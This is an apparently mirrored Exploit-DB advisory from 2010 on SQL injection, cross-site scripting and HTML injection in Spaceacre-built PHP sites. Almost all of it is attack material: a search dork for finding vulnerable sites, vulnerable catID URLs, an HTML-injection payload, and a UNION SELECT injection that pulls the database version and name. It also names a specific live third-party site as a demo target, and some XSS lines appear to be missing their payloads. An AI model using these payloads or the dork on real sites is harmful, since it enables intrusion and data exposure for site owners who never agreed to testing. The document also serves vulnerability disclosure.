Spaceacre – SQL Injection / Cross-Site Scripting / HTML Injection

• Exploit Database
• 8 阅读

• 作者： XroGuE
  日期： 2010-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12746/

• =========================================================
  Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
  =========================================================
  #########################################
  # Name: Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
  # Vendor: http://www.spaceacre.com
  # Date: 2010-05-26
  # Author: XroGuE
  # Thanks to: Inj3ct0r.com [R0073r],Exploit-DB.com,SecurityReason.com,Hack0wn.com !
  # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
  # Home: (-_+)
  ##########################################
  
  [+] Dork: intext:"Designed by Spaceacre"
  
  [+] Vulnerabilities:
  
  #http://[target]/cat1.php?catID=[SQL/XSS/HTML]
  #http://[target]/cat2.php?catID=[SQL/XSS/HTML]
  #http://[target]/cat3.php?catID=[SQL/XSS/HTML]
  #http://[target]/cat4.php?catID=[SQL/XSS/HTML]
  #http://[target]/cat5.php?catID=[SQL/XSS/HTML]
  #http://[target]/cat6.php?catID=[SQL/XSS/HTML]
  
  
  [+] XSS InjecTion Vulnerability:
  
  [+] Live Demo: http://www.baselinengn.com/cat1.php?catID=
  http://server/cat2.php?catID=
  http://server/cat3.php?catID=
  http://server/cat4.php?catID=
  
  ###########################################
  
  [+] HTML InjecTion Vulnerability:
  
  [+] Live Demo: http://www.baselinengn.com/cat1.php?catID=<font color=red size=15>XroGuE</font>
  http://server/cat2.php?catID=<font color=red size=15>XroGuE</font>
  http://server/cat3.php?catID=<font color=red size=15>XroGuE</font>
  http://server/cat4.php?catID=<font color=red size=15>XroGuE</font>
  
  ###########################################
  
  [+] SQL InjecTion Vulnerability:
  
  [+] Live Demo : http://server/cat1.php?catID=-999+union+all+select+1,version(),database()--
  
  ###########################################